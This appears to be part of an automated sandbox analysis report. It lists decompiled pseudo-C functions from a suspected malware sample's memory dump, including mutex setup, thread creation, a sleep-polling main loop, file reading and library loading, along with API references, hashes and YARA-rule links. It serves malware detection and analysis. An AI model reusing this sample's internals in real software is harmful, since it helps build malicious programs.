Function 03602AEA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E03602AEA() {
				intOrPtr _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t26;
				void* _t29;
				signed int _t31;
				intOrPtr _t36;
				CHAR* _t38;
				intOrPtr _t39;
				void* _t40;

				_t15 =  *0x361e710 * 0x64;
				_t39 = 0;
				_v12 =  *0x361e710 * 0x64;
				_t16 = E036085EA(_t15);
				_t38 = _t16;
				_v16 = _t38;
				if(_t38 != 0) {
					_t31 =  *0x361e710; // 0x2
					_t36 = 0;
					_v8 = 0;
					if(_t31 == 0) {
						L9:
						_push(_t38);
						E03609F2E(0xe); // executed
						E03608600( &_v16, _t39);
						return 0;
					}
					_t29 = 0;
					do {
						_t21 =  *0x361e714; // 0x52e4cc8
						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
							if(_t39 != 0) {
								lstrcatA(_t38, "|");
								_t39 = _t39 + 1;
							}
							_t22 =  *0x361e714; // 0x52e4cc8
							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
							_t26 = E036095E7( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0x361e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}

0x03602af0
0x03602afa
0x03602afd
0x03602b00
0x03602b05
0x03602b07
0x03602b0d
0x03602b17
0x03602b1d
0x03602b1f
0x03602b24
0x03602b81
0x03602b87
0x03602b8b
0x03602b96
0x00000000
0x03602b9d
0x03602b26
0x03602b28
0x03602b28
0x03602b31
0x03602b35
0x03602b3d
0x03602b43
0x03602b43
0x03602b44
0x03602b49
0x03602b4d
0x03602b63
0x03602b68
0x03602b6e
0x03602b71
0x03602b74
0x03602b74
0x03602b76
0x03602b77
0x03602b7a
0x03602b7d
0x00000000
0x03602b28
0x00000000

APIs

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

lstrcatA.KERNEL32(00000000,0361B998,03605726,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,03605726), ref: 03602B3D

Strings

%u;%u;%u, xrefs: 03602B59

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AllocateHeaplstrcat
String ID: %u;%u;%u
API String ID: 3011335133-2973439046
Opcode ID: cb812e8dc2c8a52ad828d64e6b12d87da70c16e2ee9267508ea7426ee4ff02c1
Instruction ID: d87708dba94d7f850a9f6cca8dc9c6477d5bec0d1b6000e0a413d7368fd84f0b
Opcode Fuzzy Hash: cb812e8dc2c8a52ad828d64e6b12d87da70c16e2ee9267508ea7426ee4ff02c1
Instruction Fuzzy Hash: CF11E436A00300AFDB19EFE9D999D5FBBB9EF84324B18482AD804DB288D731C901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0360595C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0360595C(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E0360A853( &_v52, __ecx, __eflags);
				_t16 =  *0x361e688; // 0x33f0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E03609278("Global");
				_t19 = E036058F4(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					FindCloseChangeNotification(_v8);
					_v8 = 0;
					E036058F4( &_v52, _t42,  &_v8); // executed
				}
				E03608600( &_v12, 0xffffffff);
				return _v8;
			}

0x03605964
0x0360596a
0x03605970
0x03605975
0x03605980
0x03605982
0x03605982
0x03605989
0x00000000
0x03605989
0x03605991
0x03605995
0x03605996
0x036059a8
0x036059b0
0x036059b8
0x036059bb
0x036059c5
0x036059cb
0x036059d4
0x036059d9
0x036059e0
0x036059ed

APIs

FindCloseChangeNotification.KERNELBASE(03605DBC,?,?,?,?,00000002), ref: 036059C5

Strings

Global, xrefs: 0360599B

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID: Global
API String ID: 2591292051-4020866741
Opcode ID: 820656e97b4cb3a60cede465e00922b0af6f6bca0f68c03dba00794c9011c0fd
Instruction ID: 497e07de841c990a71fa3a5fa39236d9e32a6bae70cbe58fba793532b4ccd5db
Opcode Fuzzy Hash: 820656e97b4cb3a60cede465e00922b0af6f6bca0f68c03dba00794c9011c0fd
Instruction Fuzzy Hash: AB11C275E14218AFCF08EB98D942CDEB7F8EB85210F24006AF906EB295DA309A00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 036098D4, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E036098D4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x361e76c; // 0x3a8
				_t73 = 0;
				if(E0360A4A5(_t77, 0x7530) >= 0) {
					_t45 =  *0x361e770; // 0x52e6340
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x361e770; // 0x52e6340
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x361e770; // 0x52e6340
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x361e770; // 0x52e6340
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0360A457(0, 1);
									_t82 =  *0x361e770; // 0x52e6340
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x361e770; // 0x52e6340
									_t30 = _t83 + _t113 + 4; // 0x52e6344
									_t52 = CreateThread(_t73, _t73, E0360988C, _t83 + _t113, _t73, _t30);
									_t53 =  *0x361e770; // 0x52e6340
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x361e770; // 0x52e6340
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x361e770; // 0x52e6340
										 *0x361e774 =  *0x361e774 + 1;
										E0360A4C1( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x361e770; // 0x52e6340
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x361e684; // 0x530f6c8
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x361e770; // 0x52e6340
										_t37 = _t61 + 0xc; // 0x52e634c
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E03608600(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x361e770; // 0x52e6340
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x361e76c; // 0x3a8
									E0360A4C1(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E036085EA(_t110);
								_t97 =  *0x361e770; // 0x52e6340
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x361e770; // 0x52e6340
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x361e770; // 0x52e6340
								E036086C7( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x361e684; // 0x530f6c8
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x361e770; // 0x52e6340
							goto L7;
						}
						_t98 =  *0x361e770; // 0x52e6340
						E03609830(_t106 + _t98, 0);
						_t45 =  *0x361e770; // 0x52e6340
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x036098d7
0x036098d8
0x036098d9
0x036098e1
0x036098e4
0x036098eb
0x036098f4
0x036098fd
0x03609904
0x03609906
0x03609908
0x03609908
0x0360990d
0x03609935
0x03609938
0x03609952
0x03609958
0x03609998
0x0360999c
0x036099a1
0x036099a5
0x036099a5
0x036099b1
0x036099b5
0x036099bd
0x036099c3
0x036099c8
0x036099ce
0x036099d2
0x036099da
0x036099ec
0x036099f1
0x036099f6
0x036099f9
0x036099fe
0x03609a03
0x03609a3f
0x03609a45
0x03609a4b
0x03609a55
0x03609a5a
0x03609a60
0x03609a05
0x03609a09
0x03609a0e
0x03609a11
0x03609a16
0x03609a19
0x03609a1d
0x03609a24
0x03609a29
0x03609a2f
0x03609a37
0x03609a38
0x03609a38
0x03609a62
0x03609a62
0x03609a68
0x03609a6e
0x03609a71
0x03609a73
0x03609a73
0x0360995a
0x0360995e
0x03609964
0x0360996a
0x0360996e
0x03609977
0x00000000
0x00000000
0x0360997d
0x03609981
0x0360998e
0x03609993
0x00000000
0x03609993
0x00000000
0x03609938
0x0360990f
0x03609914
0x03609915
0x0360991e
0x0360994b
0x00000000
0x0360994b
0x03609920
0x0360992b
0x03609930
0x00000000
0x0360993a
0x0360993a
0x0360993d
0x0360993e
0x00000000
0x03609946
0x036098f6
0x00000000

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e5a97fdee7d00b434013491d64ee9f75410cff264cd9344c460f55a729b4ed
Instruction ID: 115049bc8350069468ada9c2c4018c421c94b69719fd56668448800f7b0b2738
Opcode Fuzzy Hash: 20e5a97fdee7d00b434013491d64ee9f75410cff264cd9344c460f55a729b4ed
Instruction Fuzzy Hash: DA515476610700DFD71EDF69D889827B7E6FB48314758592EE8468739ED731E802CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03605619, Relevance: 3.1, APIs: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E03605619(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E03609E4C(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E036097F2(0x361e6c8);
					_t39 = 0x37; // executed
					E03609EEC(_t39);
					_t11 =  *0x361e688; // 0x33f0000
					_t40 = 0x3a; // executed
					E03609EEC(_t40); // executed
					E0360E4CC(_t63);
					_t14 =  *0x361e688; // 0x33f0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0360A853( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x361e684; // 0x530f6c8
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x361e6c8,  *0x361e6cc);
					 *0x361e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x361e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E036085EA(0x1000);
							_t52 = 0;
							 *0x361e770 = _t34;
							_t49 =  *0x361e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0x361e774 =  !=  ? 0 : _t49; // executed
						}
						E0360153B(_t41, _t52); // executed
						E036098D4(E03602EDA, 0, __eflags, 0, 0); // executed
						E03603017(); // executed
						E036031C2(__eflags); // executed
						E036029B1(); // executed
						E03603BB3(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x361e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E036097F2(0x361e750);
							_push(0x361e750);
							_push(0x361e750); // executed
							E0360279B();
							Sleep(0xfa0);
						}
						E03603D35();
						E03609A74();
						E036034C0();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E03602DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x03605619
0x03605625
0x0360562e
0x03605639
0x0360563e
0x03605651
0x03605652
0x03605657
0x03605667
0x03605668
0x03605670
0x03605675
0x0360567a
0x03605684
0x03605687
0x03605691
0x03605699
0x0360569f
0x036056a6
0x036056b8
0x036056be
0x036056c3
0x036056c5
0x036056cc
0x036056d1
0x036056d3
0x036056d9
0x036056df
0x036056e1
0x036056e4
0x036056e4
0x036056ea
0x036056f8
0x036056ff
0x03605704
0x03605709
0x0360570e
0x03605738
0x03605738
0x0360573e
0x00000000
0x00000000
0x0360571a
0x0360571f
0x03605720
0x03605721
0x03605732
0x03605732
0x03605740
0x03605745
0x0360574a
0x0360574f
0x0360574f
0x00000000
0x00000000
0x00000000
0x03605630
0x03605630
0x03605635
0x03605637
0x036056a8
0x036056aa
0x00000000
0x00000000
0x00000000
0x03605637
0x03605755

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 036056B8

Part of subcall function 036097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,03605F8C), ref: 036097FF

Sleep.KERNELBASE(00000FA0), ref: 03605732

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Time$CreateFileMutexSleepSystem
String ID:
API String ID: 1795067453-0
Opcode ID: f0739b52c6284f0df6e6eb4ce38acc7ac5a1a8bd073fc3f9248874df0f093bc9
Instruction ID: 61c72b5e5d2c3c93cba6a420c653d03ab0385603ccb2c606435d6e33e3202c2c
Opcode Fuzzy Hash: f0739b52c6284f0df6e6eb4ce38acc7ac5a1a8bd073fc3f9248874df0f093bc9
Instruction Fuzzy Hash: 6A3125392153009AE71CFB70980FD5B3BD9DF06320B18042EF9098A2E9EF21C410CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0360A68F, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0360A68F(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0360A621(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x361e684; // 0x530f6c8
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E03608600( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E036085EA(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							FindCloseChangeNotification(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x0360a692
0x0360a693
0x0360a694
0x0360a698
0x0360a69a
0x0360a69f
0x0360a6af
0x0360a6b3
0x0360a73d
0x0360a73d
0x0360a73f
0x0360a741
0x0360a743
0x0360a743
0x0360a6b9
0x0360a6c7
0x0360a6cb
0x0360a723
0x0360a723
0x0360a729
0x0360a72e
0x0360a736
0x0360a73c
0x00000000
0x0360a72e
0x0360a6cd
0x0360a6d6
0x0360a6d8
0x0360a6de
0x00000000
0x00000000
0x0360a6e2
0x0360a6e5
0x0360a6e6
0x0360a6ec
0x0360a6ed
0x0360a6ee
0x0360a713
0x0360a6f5
0x0360a747
0x00000000
0x00000000
0x0360a749
0x0360a74c
0x0360a752
0x0360a754
0x0360a754
0x0360a75c
0x0360a75f
0x00000000
0x0360a75f
0x0360a6fd
0x0360a700
0x0360a704
0x0360a706
0x0360a709
0x0360a70e
0x0360a712
0x0360a712
0x00000000
0x0360a713
0x0360a6a1
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0360FA61,00000000,0360F8C0,033EEFE0,0361B988,00000000,0361B988,00000000,00000000,00000615), ref: 0360A719
FindCloseChangeNotification.KERNELBASE(00000000,?,0360FA61,00000000,0360F8C0,033EEFE0,0361B988,00000000,0361B988,00000000,00000000,00000615,0000034A,00000000,0530FB08,00000400), ref: 0360A75C

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ChangeCloseFileFindNotificationRead
String ID:
API String ID: 1200561807-0
Opcode ID: 0fd255b8d208680ddbe158aa09fcf673704dd4bd294da0d6ddfe2530a741cb2f
Instruction ID: 65c092b55a3842492e088717fd1c55ac2a73721fb433b2e7eee729f8d99f79e2
Opcode Fuzzy Hash: 0fd255b8d208680ddbe158aa09fcf673704dd4bd294da0d6ddfe2530a741cb2f
Instruction Fuzzy Hash: B521857A610305AFDB19CFA4C989FABB7BCEF44680F15806AF905DB281E770D9408794

Uniqueness

Uniqueness Score: -1.00%

Function 0360153B, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0360153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0); // executed
				 *0x361e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x361e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E03601080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x361e6e8 = E0360918C(_t3, 0);
							E036085A8( &_v8);
							_t7 = E036085EA(0x100);
							 *0x361e6f0 = _t7;
							if(_t7 != 0) {
								 *0x361e6fc = 0;
								_t9 = E036085EA(0x401);
								 *0x361e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x361e6c0; // 0x0
									if(__eflags == 0) {
										E036115C1(0x36081e8, 0x36081f1);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0360E1C7(0x361bd14, _t24); // executed
									 *0x361e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x0360153e
0x03601545
0x0360154b
0x03601552
0x03601607
0x03601607
0x03601607
0x03601558
0x0360155b
0x03601561
0x03601568
0x00000000
0x0360156e
0x03601573
0x03601578
0x0360157d
0x00000000
0x03601583
0x0360158f
0x03601594
0x0360159e
0x036015a3
0x036015ab
0x036015b9
0x036015bf
0x036015c4
0x036015ca
0x036015cc
0x036015d2
0x036015d8
0x036015e4
0x036015ea
0x036015eb
0x036015f2
0x036015f8
0x036015fd
0x03601602
0x036015ce
0x036015ce
0x00000000
0x036015ce
0x036015ad
0x036015ad
0x036015af
0x036015af
0x036015af
0x036015ab
0x0360157d
0x03601568
0x0360160c

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,?,?,036056EF), ref: 03601545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,036056EF), ref: 0360155B

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: ca3deb4c26a7edf3beea10f1fbad92f583c71991c4e3cf843aba728ba3c908c3
Instruction ID: 9592dfeb5c1365b579b4e7c98e4d6e481c1117932b1190336efbfeb3d2e1aff4
Opcode Fuzzy Hash: ca3deb4c26a7edf3beea10f1fbad92f583c71991c4e3cf843aba728ba3c908c3
Instruction Fuzzy Hash: 2A11E97C614302AAD71EEBB6AD1691B3AA4DB8376175C052FE811CB2C8FF71C4108654

Uniqueness

Uniqueness Score: -1.00%

Function 0360E1C7, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0360E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E036095AD(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0360E17C(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E036085A8( &_v8);
				return _t25;
			}

0x0360e1ca
0x0360e1cd
0x0360e1d3
0x0360e1d5
0x0360e1da
0x0360e1dc
0x0360e1e6
0x0360e1e7
0x0360e1f6
0x0360e1e9
0x0360e1e9
0x0360e1e9
0x0360e1fa
0x0360e201
0x0360e207
0x0360e207
0x0360e20c
0x0360e217

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0361BA20), ref: 0360E1E9
LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,0361BA20), ref: 0360E1F6

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 595495d3018a9de0d537a0941d2bcd5f4a000f4528e5b6a46642a8c23019a570
Instruction ID: f44461b2567c0f169fe28b79ade96852b7ca5645c1ec49ac2a3e64ddad65149b
Opcode Fuzzy Hash: 595495d3018a9de0d537a0941d2bcd5f4a000f4528e5b6a46642a8c23019a570
Instruction Fuzzy Hash: EEF0A731700224ABD70CEBADE88689BF7EC9F85691714447EF406D72D1DA71DE4087E4

Uniqueness

Uniqueness Score: -1.00%

Function 03602C8F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E03602C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0360B6E6(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0360BB73(_t70) == 0) {
					_t23 = E03602BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E03602C64( &_v1084, __eflags);
					} else {
						E0360AFF8(_t54,  &_v564); // executed
						_t32 = E0360109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E036092CB( &_v1084);
						E036085BB( &_v12);
					}
				} else {
					_t38 = E0360109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x361e684; // 0x530f6c8
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0360109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E036092CB( &_v564);
						E036085BB( &_v8);
					} else {
						_t71 = E03602C64( &_v44, _t78);
					}
					E036085BB( &_v12);
				}
				_v8 = _t71;
				_t25 = E0360B24F(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0360B24F(_t71) == 0) {
						E03608600( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x03602c9e
0x03602ca0
0x03602ca3
0x03602ca9
0x03602cb2
0x03602d36
0x03602d3b
0x03602d3c
0x03602d3e
0x03602d8f
0x03602d40
0x03602d46
0x03602d50
0x03602d55
0x03602d5a
0x03602d5d
0x03602d5e
0x03602d63
0x03602d64
0x03602d65
0x03602d6c
0x03602d6d
0x03602d7a
0x03602d80
0x03602d85
0x03602cb4
0x03602cb9
0x03602cbe
0x03602ccc
0x03602cd0
0x03602cd5
0x03602cdb
0x03602cdd
0x03602ced
0x03602cf2
0x03602cf7
0x03602cfa
0x03602cfb
0x03602d00
0x03602d01
0x03602d02
0x03602d0f
0x03602d15
0x03602cdf
0x03602ce4
0x03602ce4
0x03602d21
0x03602d26
0x03602d93
0x03602d96
0x03602d9d
0x03602da1
0x03602da9
0x03602dbc
0x03602dc1
0x03602dc5
0x03602da9
0x03602dca

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 03602DA1

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 5f787b4d7c0d7291ba34846423b95cf8796331e3ad30a5d50e1f93ef09707718
Instruction ID: 51fffa9b6e67efb5ed6772d79dc64d83fd4defa33b3f922de68bd324106cd951
Opcode Fuzzy Hash: 5f787b4d7c0d7291ba34846423b95cf8796331e3ad30a5d50e1f93ef09707718
Instruction Fuzzy Hash: A23186B5A10314ABDB1CEBA0CD66AEF72ACAF14610F04055DE515EB2C0EF709F4487A9

Uniqueness

Uniqueness Score: -1.00%

Function 03605AE7, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03605AE7(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E036085EA(0x14);
				_t38 =  *0x361e688; // 0x33f0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
